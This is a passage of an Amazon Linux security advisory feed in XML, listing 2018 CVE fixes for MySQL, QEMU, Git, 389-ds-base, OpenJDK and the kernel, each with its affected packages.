arch="x86_64"><filename>Packages/mysql56-embedded-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.40-1.29.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.40" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.40-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1028</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1028: medium priority package update for mysql55</title><issued date="2018-05-25 18:26:00" /><updated date="2018-05-29 23:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2819:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568956:
CVE-2018-2819 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2818:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568955:
CVE-2018-2818 mysql: Server : Security : Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2817:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568954:
CVE-2018-2817 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2813:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1568951:
CVE-2018-2813 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2781:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568942:
CVE-2018-2781 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2773:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568932:
CVE-2018-2773 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2771:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568931:
CVE-2018-2771 mysql: Server: Locking unspecified vulnerability (CPU Apr 2018)
CVE-2018-2761:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1568924:
CVE-2018-2761 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2755:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1568921:
CVE-2018-2755 mysql: Server: Replication unspecified vulnerability (CPU Apr 2018)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2755" title="" id="CVE-2018-2755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2761" title="" id="CVE-2018-2761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2771" title="" id="CVE-2018-2771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2773" title="" id="CVE-2018-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2781" title="" id="CVE-2018-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2813" title="" id="CVE-2018-2813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2817" title="" id="CVE-2018-2817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2818" title="" id="CVE-2018-2818" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2819" title="" id="CVE-2018-2819" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-bench" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.60" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.60-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.60-1.21.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.60" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.60-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1034</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1034: important priority package update for qemu-kvm</title><issued date="2018-06-08 18:29:00" /><updated date="2018-06-11 21:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7858:
Quick Emulator (aka QEMU), when built with the Cirrus CLGD 54xx VGA Emulator support, allows local guest OS privileged users to cause a denial of service (out-of-bounds access and QEMU process crash) by leveraging incorrect region calculation when updating VGA display.
1553402:
CVE-2018-7858 QEMU: cirrus: OOB access when updating VGA display
CVE-2018-5683:
An out-of-bounds read access issue was found in the VGA emulator of QEMU. It could occur in vga_draw_text routine, while updating display area for a vnc client. A privileged user inside a guest could use this flaw to crash the QEMU process resulting in DoS.
1530356:
CVE-2018-5683 Qemu: Out-of-bounds read in vga_draw_text routine
CVE-2018-3639:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load &amp; Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.
1566890:
CVE-2018-3639 hw: cpu: speculative store bypass
CVE-2017-15268:
A memory leakage issue was found in the I/O channels websockets implementation of the Quick Emulator (QEMU). It could occur while sending screen updates to a client, which is slow to read and process them further. A privileged guest user could use this flaw to cause a denial of service on the host and/or potentially crash the QEMU process instance on the host.
1496879:
CVE-2017-15268 QEMU: I/O: potential memory exhaustion via websock connection to VNC
CVE-2017-15124:
VNC server implementation in Quick Emulator (QEMU) was found to be vulnerable to an unbounded memory allocation issue, as it did not throttle the framebuffer updates sent to its client. If the client did not consume these updates, VNC server allocates growing memory to hold onto this data. A malicious remote VNC client could use this flaw to cause DoS to the server host.
1525195:
CVE-2017-15124 Qemu: memory exhaustion through framebuffer update request message in VNC server
CVE-2017-13711:
A use-after-free issue was found in the Slirp networking implementation of the Quick emulator (QEMU). It occurs when a Socket referenced from multiple packets is freed while responding to a message. A user/process could use this flaw to crash the QEMU process on the host resulting in denial of service.
1486400:
CVE-2017-13711 QEMU: Slirp: use-after-free when sending response
CVE-2017-13672:
An out-of-bounds read access issue was found in the VGA display emulator built into the Quick emulator (QEMU). It could occur while reading VGA memory to update graphics display. A privileged user/process inside guest could use this flaw to crash the QEMU process on the host resulting in denial of service situation.
1486560:
CVE-2017-13672 QEMU: vga: OOB read access during display update
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13672" title="" id="CVE-2017-13672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13711" title="" id="CVE-2017-13711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15124" title="" id="CVE-2017-15124" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15268" title="" id="CVE-2017-15268" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639" title="" id="CVE-2018-3639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5683" title="" id="CVE-2018-5683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7858" title="" id="CVE-2018-7858" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.8.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.8.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.8.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.8.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.8.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.8.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1035</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1035: important priority package update for git</title><issued date="2018-06-08 18:31:00" /><updated date="2018-06-11 21:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11235:
In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs &quot;git clone --recurse-submodules&quot; because submodule &quot;names&quot; are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with &quot;../&quot; in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.
1583862:
CVE-2018-11235 git: arbitrary code execution when recursively cloning a malicious repository
CVE-2018-11233:
In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory.
1583888:
CVE-2018-11233 git: path sanity-checks on NTFS can read arbitrary memory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11233" title="" id="CVE-2018-11233" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11235" title="" id="CVE-2018-11235" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-bzr" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git" version="2.14.4" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.4-2.58.amzn1.x86_64.rpm</filename></package><package name="git-daemon" version="2.14.4" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.4-2.58.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.14.4" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.4-2.58.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.14.4" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.4-2.58.amzn1.x86_64.rpm</filename></package><package name="git-debuginfo" version="2.14.4" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.4-2.58.amzn1.x86_64.rpm</filename></package><package name="git-daemon" version="2.14.4" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.4-2.58.amzn1.i686.rpm</filename></package><package name="git" version="2.14.4" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.4-2.58.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.14.4" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.4-2.58.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.14.4" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.4-2.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1036</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1036: important priority package update for 389-ds-base</title><issued date="2018-06-08 18:32:00" /><updated date="2018-06-11 21:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1089:
It was found that 389-ds-base did not properly handle long search filters with characters needing escapes, possibly leading to buffer overflows. A remote, unauthenticated attacker could potentially use this flaw to make ns-slapd crash via a specially crafted LDAP request, thus resulting in denial of service.
1559802:
CVE-2018-1089 389-ds-base: ns-slapd crash via large filter value in ldapsearch
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1089" title="" id="CVE-2018-1089" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.7.5-21.56.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.7.5-21.56.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.7.5-21.56.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.7.5-21.56.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.7.5-21.56.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.7.5" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.7.5-21.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1037</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1037: important priority package update for java-1.7.0-openjdk</title><issued date="2018-06-08 18:32:00" /><updated date="2018-06-11 21:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3639:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load &amp; Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.
1566890:
CVE-2018-3639 hw: cpu: speculative store bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639" title="" id="CVE-2018-3639" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.181-2.6.14.8.80.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.8.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.181" release="2.6.14.8.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.181-2.6.14.8.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1038</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1038: important priority package update for kernel</title><issued date="2018-06-08 18:33:00" /><updated date="2018-09-06 22:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3693:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions past bounds check. The flaw relies on the presence of a precisely-defined instruction sequence in the privileged code and the fact that memory writes occur to an address which depends on the untrusted value. Such writes cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to influence speculative execution and/or read privileged memory by conducting targeted cache side-channel attacks.
1581650:
CVE-2018-3693 Kernel: speculative bounds check bypass store
CVE-2018-3639:
